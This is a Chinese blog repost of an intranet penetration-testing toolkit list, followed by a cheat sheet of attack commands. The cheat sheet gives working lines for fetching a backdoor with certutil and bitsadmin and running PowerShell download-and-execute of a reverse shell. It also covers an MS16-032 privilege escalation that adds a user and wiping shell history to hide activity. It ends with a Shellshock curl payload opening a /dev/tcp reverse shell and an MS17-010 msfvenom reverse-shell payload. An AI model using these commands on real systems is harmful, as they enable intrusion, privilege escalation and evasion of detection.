内网渗透工具- Intranet-Penetration

二叶草
二叶草
二叶草
1214
文章
0
评论
2020年3月28日09:37:44 评论 321

 整理一些常用的内外网渗透测试工具

PHPoxy 通过PHP脚本运行一个可以访问内网机器的Web代理。

SocksCap  socks5代理客户端

XX-Net    科学上网利器

phpsocks5  通过php脚本创建socks5代理服务

socks     包含创建socks5代理服务的python脚本,以及ssocks 内网穿透神器。

Cain      内网嗅探神器

F-NAScan    网络资产信息扫描

X-Sniff    网络嗅探小工具

asocks5     创建socks5代理服务的小公举

bc.pl      反弹bash shell的perl脚本

bypassUAC

http    创建HTTP服务

l.7z    lcx的slave版本,免杀

n.7z     nc.exe

smsniff2 抓包工具

wget     win版wget

get.7z get64.7z mimikatz无交互版 直接shell下运行 get.7z (不是压缩文件)

常用命令

1、开web
python2 -m SimpleHTTPServer python3 -m http.server

2、download backdoor

certutil.exe -urlcache -split -f http://xxxx/g.jpg
bitsadmin /rawreturn /transfer getfile http://xxxx/g.jpgc:p.7z

3、tty

python -c 'import pty; pty.spawn("/bin/sh")'

4、powershell
root@kali:/tmp# wget

https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
root@kali:/tmp# wget
https://gist.githubusercontent.com/intrd/6dda33f61dca560e6996d01c62203374/raw/babf9a6afd23bb17a89bb3415099459db7bd25cf/ms16_032_intrd_mod.ps1
powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (new-object    system.net.webclient).downloadfile('http://10.1.x.x:8000/Invoke-PowerShellTcp.ps1','Invoke-PowerShellTcp.ps1')

powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (new-object    system.net.webclient).downloadfile('http://10.1.x.x:8000/ms16_032_intrd_mod.ps1','ms16_032_intrd_mod.ps1')

IEX (New-Object Net.WebClient).DownloadString('http://10.1.x.x:8000/ms16_032_intrd_mod.ps1');Invoke-MS16-032 "-
NoProfile - ExecutionPolicy Bypass -Command net user a xxxx /ad"

5、不记录his
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0

6、破壳漏洞

curl --user-agent '() { ignored;};/bin/bash -i >& /dev/tcp/xxx/3389 0>&1' http://xxx/cgi-bin/admin.cgi

7、ms17010
https://www.exploit-db.com/exploits/42315
msfvenom -p windows/shell/reverse_tcp lhost=xxx lport=3389 -f exe-service > f.exe
smb_send_file(smbConn, '/opt/17010/f.exe', 'C', '/f.exe') service_exec(conn, r'c:f.exe')

【文章来源】:

https://github.com/yuxiaokui/Intranet-Penetration

本文来源于:内网渗透工具- Intranet-Penetration-变化吧门户
特别声明:以上文章内容仅代表作者本人观点,不代表变化吧门户观点或立场。如有关于作品内容、版权或其它问题请于作品发表后的30日内与变化吧联系。

转载请注明:{{title}}-变化吧
  • 赞助本站
  • 微信扫一扫
  • weinxin
  • 赞助本站
  • 支付宝扫一扫
  • weinxin
二叶草
渗透测试实用工具 渗透

渗透测试实用工具

 工具概述 1、新增批量修改文件夹文件后缀功能,并重新排列工具,更加详细使用 2、新增文件夹监控功能,监控python tool.py -monitor C: 3、新增将包含rgb值的txt...
简谈渗透测试各阶段我常用的那些“神器” 渗透

简谈渗透测试各阶段我常用的那些“神器”

 前言 本人所有文章都很用心的写作完成,并时常总结如何分享更有用的东西给朋友们。这篇更是如此,晚上准备到凌晨四点开始写作,为了需要的朋友而写,不喜欢的右上角点叉不要像上次文章一样在下面喷粪逼我骂你,另...
5种无线WIFI黑客渗透工具推荐 渗透

5种无线WIFI黑客渗透工具推荐

1、Aircrack-ng Aircrack-ng是目前最流行的WiFi密码破解工具。 它侧重于WiFi安全的不同领域,监控:数据包捕获和数据导出到文本文件,以供第三方工具进一步处理,攻击:通过数据包...